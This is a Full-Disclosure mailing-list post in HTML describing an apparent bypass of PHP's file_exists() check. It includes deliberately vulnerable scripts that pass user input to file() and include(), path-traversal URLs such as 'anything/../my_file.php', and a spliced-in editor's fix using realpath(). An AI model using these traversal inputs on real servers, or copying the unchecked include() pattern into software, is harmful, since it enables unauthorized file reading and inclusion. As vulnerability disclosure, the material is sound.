
[Full-Disclosure] file_exists() bypassing , critical problem ?



<html><div style='background-color:'><DIV class=RTE>&nbsp;Hi,</DIV>
<DIV class=RTE>&nbsp;There is a security problem with the file_exists() function 
that allows<BR>&nbsp;unauthorized users to bypass the function.</DIV>
<DIV class=RTE>&nbsp;For example, a user uses this function to check the 
existence of his file "my_file.php" in the "/test" directory<BR>&nbsp;and to 
display its source code.</DIV>
<DIV class=RTE>&nbsp;He uses a script like this one:</DIV>
<DIV class=RTE>&nbsp;----- file_exists.php -----</DIV>
<DIV class=RTE><PRE>&lt;?php
if (file_exists($var)) {
    echo("File exist&lt;br&gt;&lt;br&gt;");
    $source = file($var);
    while (list($num_line, $line) = each($source))
    {
        echo "&lt;B&gt;Line $num_line:&lt;/B&gt; " . htmlspecialchars($line) . "&lt;br&gt;";
    }
} else {
    echo("File doesn't exist&lt;br&gt;&lt;br&gt;");
    $source = file($var);   // line 11: the file is read anyway, on purpose, to show the mismatch
    while (list($num_line, $line) = each($source))   // line 12
    {
        echo "&lt;B&gt;Line $num_line:&lt;/B&gt; " . htmlspecialchars($line) . "&lt;br&gt;";
    }
}
?&gt;</PRE></DIV>
<DIV class=RTE>&nbsp;----- file_exists.php -----</DIV>
<DIV class=RTE>&nbsp;He tests his script with the following address on his server:<BR>&nbsp;<A 
href="http://[server]/test/file_exists.php?var=my_file.php">http://[server]/test/file_exists.php?var=my_file.php</A></DIV>
<DIV class=RTE>&nbsp;The file "my_file.php" contains the following text:</DIV>
<DIV class=RTE>&nbsp;----- my_file.php -----</DIV>
<DIV class=RTE>&nbsp;PHP is a widely-used<BR>&nbsp;general-purpose 
scripting<BR>&nbsp;language that is especially<BR>&nbsp;suited for Web 
development<BR>&nbsp;and can be embedded into HTML.</DIV>
<DIV class=RTE>&nbsp;----- my_file.php -----</DIV>
<DIV class=RTE>&nbsp;After running his script, he obtains:</DIV>
<DIV class=RTE>&nbsp;----- <A 
href="http://[server]/test/file_exists.php?var=my_file.php">http://[server]/test/file_exists.php?var=my_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;File exist</DIV>
<DIV class=RTE>&nbsp;Line 0: PHP is a widely-used<BR>&nbsp;Line 1: 
general-purpose scripting<BR>&nbsp;Line 2: language that is 
especially<BR>&nbsp;Line 3: suited for Web development<BR>&nbsp;Line 4: and can 
be embedded into HTML.</DIV>
<DIV class=RTE>&nbsp;----- <A 
href="http://[server]/test/file_exists.php?var=my_file.php">http://[server]/test/file_exists.php?var=my_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;Up to here everything seems to be normal.</DIV>
<DIV class=RTE>&nbsp;If he tests it with another file name, he obtains:</DIV>
<DIV class=RTE>&nbsp;----- <A 
href="http://[server]/test/file_exists.php?var=another_file.php">http://[server]/test/file_exists.php?var=another_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;File doesn't exist</DIV>
<DIV class=RTE><BR>&nbsp;Warning: file(test): failed to open stream: No such 
file or directory in<BR>&nbsp;/home/xxx/www/test/file_exists.php on line 
11</DIV>
<DIV class=RTE>&nbsp;Warning: Variable passed to each() is not an array or 
object in<BR>&nbsp;/home/xxx/www/test/file_exists.php on line 12</DIV>
<DIV class=RTE>&nbsp;----- <A 
href="http://[server]/test/file_exists.php?var=another_file.php">http://[server]/test/file_exists.php?var=another_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;It's normal too...</DIV>
<DIV class=RTE>&nbsp;But if a user tests this script with, for example, the 
following link:<BR>&nbsp;<A 
href="http://[server]/test/file_exists.php?var=anything/../my_file.php">http://[server]/test/file_exists.php?var=anything/../my_file.php</A>,
 he<BR>obtains:</DIV>
<DIV class=RTE>&nbsp;-----<BR><A 
href="http://[server]/test/file_exists.php?var=anything/../my_file.php">http://[server]/test/file_exists.php?var=anything/../my_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;File doesn't exist</DIV>
<DIV class=RTE>&nbsp;Line 0: PHP is a widely-used<BR>&nbsp;Line 1: 
general-purpose scripting<BR>&nbsp;Line 2: language that is 
especially<BR>&nbsp;Line 3: suited for Web development<BR>&nbsp;Line 4: and can 
be embedded into HTML.</DIV>
<DIV class=RTE>&nbsp;-----<BR><A 
href="http://[server]/test/file_exists.php?var=anything/../my_file.php">http://[server]/test/file_exists.php?var=anything/../my_file.php</A>
 -----</DIV>
<DIV class=RTE>&nbsp;We can see that file_exists() reports that the 
file doesn't<BR>&nbsp;exist, but the source code has been displayed anyway.</DIV>
<DIV class=RTE>&nbsp;It's a very critical bug because a malicious user can use 
it to bypass<BR>&nbsp;a file_exists() protection in front of an include(), for 
example.</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV 
class=RTE>°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Another, simpler example:</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>In the same directory:</DIV>
<DIV class=RTE>test.php</DIV>
<DIV class=RTE>-----------------------------------------------------------</DIV>
<DIV class=RTE><PRE>&lt;?php
if (file_exists($page)) {
    echo("Sorry the local page is protected");
} else {
    include($page);
}
?&gt;</PRE></DIV>
<DIV class=RTE>-----------------------------------------------------------</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>file.txt</DIV>
<DIV class=RTE>-----------------------------------------------------------</DIV>
<DIV class=RTE>Hello Word</DIV>
<DIV class=RTE>-----------------------------------------------------------</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE><A 
href="http://www.example.com/test.php?page=file.txt">http://www.example.com/test.php?page=file.txt</A></DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Result:</DIV>
<DIV class=RTE>Sorry the local page is protected</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE><A 
href="http://www.example.com/test.php?page=./foo/../file.txt">http://www.example.com/test.php?page=./foo/../file.txt</A></DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Result:</DIV>
<DIV class=RTE>Hello Word</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>The file_exists() function is bypassed.</DIV>
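<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Added example (editor's code, not part of the original post): the defensive pattern for both cases above is to canonicalize the user-supplied path once with realpath(), refuse anything that does not resolve under an allowed directory, and then use that same resolved path for the access that was checked, whether file() as in file_exists.php or include() as in test.php. The base directory pages/ under the script's own directory and the helper name resolve_under_base() are assumptions.</DIV>

```php
<?php
// Added example (not from the original post): resolve the user-supplied path
// once with realpath() and use that single canonical path for BOTH the check
// and the file access. "anything/../my_file.php" then cannot be judged
// "missing" by one call and opened by the next: realpath() returns false as
// soon as a component such as "anything" does not exist.
// Assumed layout: the files to serve live under __DIR__ . '/pages'.

function resolve_under_base(string $base, string $userPath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;                        // base directory itself is missing
    }
    if (strpos($userPath, "\0") !== false) {
        return null;                        // NUL byte: reject before realpath()
    }
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) {
        return null;                        // unresolvable or nonexistent path
    }
    // Compare against the prefix with a trailing separator so that
    // "/pages_private/x" is not accepted as being under "/pages".
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;                        // resolved outside the base directory
    }
    return $target;
}

$page = $_GET['page'] ?? '';
$path = resolve_under_base(__DIR__ . '/pages', $page);

if ($path === null || !is_file($path)) {
    http_response_code(404);
    echo "File doesn't exist";
    exit;
}

// The check above and the read below now refer to the same canonical path;
// the same $path could equally be handed to include() in the second example.
foreach (file($path, FILE_IGNORE_NEW_LINES) as $num => $line) {
    echo "<b>Line $num:</b> " . htmlspecialchars($line) . "<br>";
}
```

<DIV class=RTE>On Linux, realpath('anything/../my_file.php') returns false because the component "anything" does not exist, so the path from the first example is rejected before any file is opened.</DIV>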
<DIV class=RTE>&nbsp;</DIV>
<DIV 
class=RTE>°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>
<DIV class=RTE>I want to know if you think that's a real vulnerability or 
not? (securityfocus says NO and doesn't want to publish it)</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>If you have any questions, don't hesitate to contact me.</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>Nourredine Himeur</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE>lostnoobs@security-challenge.com</DIV>
<DIV class=RTE>&nbsp;</DIV>
<DIV class=RTE><A 
href="http://www.security-challenge.com/">www.security-challenge.com</A></DIV></DIV></div></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html